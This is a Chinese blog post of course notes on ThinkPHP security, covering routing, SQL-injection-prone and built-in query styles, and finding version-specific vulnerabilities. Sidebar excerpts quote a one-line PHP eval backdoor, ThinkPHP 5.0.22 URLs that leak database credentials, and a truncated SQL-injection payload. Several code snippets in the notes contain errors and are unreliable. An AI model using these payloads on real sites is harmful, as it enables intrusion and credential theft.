day17 个人博客项目&TP框架&路由访问&安全写法&历史漏洞

最新推荐文章于 2024-02-20 09:44:52 发布
最新推荐文章于 2024-02-20 09:44:52 发布
阅读量937 收藏
点赞数 1
分类专栏: 小迪网安笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/125122674
版权

前言

#知识点:

1、基于TP框架入门安装搭建使用

2、基于TP框架内置安全写法评估

3、基于TP框架实例源码安全性评估

TP框架开发的CMS

#实例-CMS源码-EyouCMS&Fastadmin&YFCMF

AdminLTE后台管理系统

layui后台管理系统

thinkcmf

H-ui.admin后台管理系统

tpshop

FsatAdmin

eyoucms

LarryCMS后台管理系统

tpadmin后台管理系统

snake后台管理系统

ThinkSNS

DolphinPHP后台管理系统

WeMall商城系统

CLTPHP

齐博CMS

DSMALL

YFCMF

HisiPHP后台管理系统

Tplay后台管理系统

lyadmin后台管理系统

haoid后台管理系统

#使用-路由访问-控制器&对象&函数&参数

MVC支持-基于模型(M)、视图(V)、控制器(C)的设计模式

要选择C:\phpStudy\PHPTutorial\WWW\TP5\public为起始页面。

可以通过这样去访问:192.168.0.151/index(文件夹)/index(控制器)/xiaodi(方法)

这里的c代表的就是控制器 a代表方法 id代表参数。(网页代码的路径并会显示在url上)。

这里我们在aap目录下再创建一个yes文件夹 这时候就需要将 namespace 的目录改成yes。

#安全-SQL注入-不安全写法对比官方写法

1、参数过滤

Db:: table('think_user')->where('status,1')->select();

select *frin think_user where status=1;(两者效果一样)

$id=$_GET['X'];$id可以接受变动 //存在注入

$id=input['X'];$id可以接受变动 //存在注入

$id=$_GET['?get.X'];$id不可以接受变动 //不存在注入(框架定义的代码,能直接过滤)

2、内置过滤

而当你用官方手册的sql语句Db:: table('think_user')->where('status,1')->select(); 就无法产生sql注入

框架的优点:简单 便捷 内置过滤。

#安全-RCE执行-历史安全漏洞对比框架版本

1、框架版本漏洞

2、框架写法安全

3、黑盒白盒看版本

https://github.com/Mochazz/ThinkPHP-Vuln

用到TP框架找漏洞

1 看写法

2 看历史漏洞 ->版本

版本获取?

黑盒:

判断是不是TP 返回数据包

怎么看版本-报错

经验:URL地址

白盒:

看源代码配置文件

匿名用户0x3c
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
某shop后台sql注入漏洞
bishan4656的博客
07-05 850
前言 最近看了下tpshop,审计出几个鸡肋的漏洞,这个SQL注入漏洞是其中之一。然后审计完网上搜了一下发现有一堆后台的sql注入漏洞,应该是觉得后台的SQL不用修叭(我个人是可以理解的)。 漏洞触发点 首先要登录后台,这也是我说漏洞很鸡肋的原因。漏洞位于在后台的商城-》文章->文章列表处的搜索抓包,存在漏洞的参数是keywords,当输入payload' or length(databas...
day08-HTTP&Tomcat&Servlet
10-28
JavaWeb 技术栈 JavaWeb 是用 Java 技术来解决相关 web 互联网领域的技术栈。... 一、B/S 架构 B/S 架构是 Browser/Server 架构模式,它的特点是客户端只需要浏览器,应用程序的逻辑和数据都存储在服务器端。...
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
今天是几号的博客
07-19 1414
没有启用路由的情况下典型的URL访问规则是:http://serverName/index.php(或者其它应用入口文件)/模块/控制器/操作/[参数名/参数值…4、创建一个名为index.tpl的模板文件,并将以下代码复制到上述点定义文件夹中。1、创建一个文件夹,命名为smarty-demo。例子1:写法内置安全绕过-TP5-SQL注入。例子2:内置版本安全漏洞-TP5-代码执行。例子:不合规的代码写法-TP5-自写。4、文件上传操作-应用对象。2、路由访问-URL访问。3、数据库操作-应用对象。
TPshop的支付证书url直接访问漏洞
weixin_34111819的博客
12-13 276
2019独角兽企业重金招聘Python工程师标准>>> ...
ueditor php上传漏洞,Tpshop Ueditor.php任意文件上传
weixin_33181159的博客
03-11 983
in `/application/admin/controller/Ueditor.php line 80`, when action=uploadfile, FILES lead to function `upFile````case 'uploadfile':$fieldName = $CONFIG2['fileFieldName'];$result = $this->upFile($f...
TPshop商城 Getshell后门文件分析与复现
dfdhxb995397的博客
11-14 1219
本文作者:i春秋签约作家——Laimooc 官网地址:http://www.tp-shop.cn/ 影响版本:TPSHOP v2.0.0 后门文件:eval-stdin.php内容: <?phpeval('?>' . file_get_contents('php://input')); ?> 分析: 使用 file_get_con...
day01_HelloWorld&常量.pdf
11-02
【标题】:“Java语言入门:...总的来说,本资料为初学者提供了Java语言入门的全面指导,从历史背景到实际操作,再到核心概念的解析,旨在帮助读者快速建立起对Java编程的理解,并能动手编写并运行第一个Java程序。
day04-Tomcat&Servlet入门-资料.zip
09-25
day04-Tomcat&Servlet入门-资料.zip
day04-Tomcat&Servlet入门-讲义.zip
09-25
day04-Tomcat&Servlet入门-讲义.zip
day04-Tomcat&Servlet入门-代码.zip
09-25
day04-Tomcat&Servlet入门-代码.zip
thinkphp+h-ui 后台管理系统|基础版
01-07
hinkphp5 h-ui 后台管理系统 基础版 .目前只做了个权限管理 登录注册都已经完成
使用h-ui遇到的问题
松花江畔
03-29 5149
作为一个接触到这个框架不算是太久的初学者,我在使用这个框架的过程中遇到了不少的问题。现在总结起来大概是自己的开发经验不总的原因吧,为了减少帮助其他的刚刚接触到i这个框架的初学者的学习成本,同时记录下自己的所犯的错误,便于以后自己出线问题时进行错误的查找,故而记录下我的错误。        遇到的第一个问题:增加数据的时候弹出的框无法关闭,但是数据去插入到数据库里面去了,这个具体的原因我也不知道是什...
Security 拦截不到 LayuiAdmin admin.req 的请求
qq_37708081的博客
09-28 1141
注意 admin.req({ 底层请求 //Ajax请求 view.req = function(options){ 请求类型修改为 post,同时在successHandler 处理好成功的响应的code和success
Fastadmin后台插件-在线命令管理-getshell
最新发布
dzqxwzoe的博客
02-20 1834
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
layui遇坑合集
qq_44943418的博客
11-04 958
layer.open参数type为1时,content为dom元素时, 比如content: $("#dissatisfiedCauseForm"); style属性应为"display: none",否则会出现渲染问题 <div id="dissatisfiedCauseForm" style="display: none"> <form class="layui-form"> <div> <div class="p
thinkphp漏洞集合
weixin_34113237的博客
06-01 3256
整合了一个集合,方便查询 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwor...
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
scanf("%d",&day)
10-17
这是一个 C 语言中的输入语句,用于从标准输入流中读取一个整数并将其存储在变量 day 中。scanf 函数的返回值为成功读取的参数个数,如果返回值小于参数个数,则表示读取失败。 相关问题: 1. scanf 函数还支持哪些格式化字符? 2. 如果输入的不是整数,scanf 函数会发生什么? 3.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值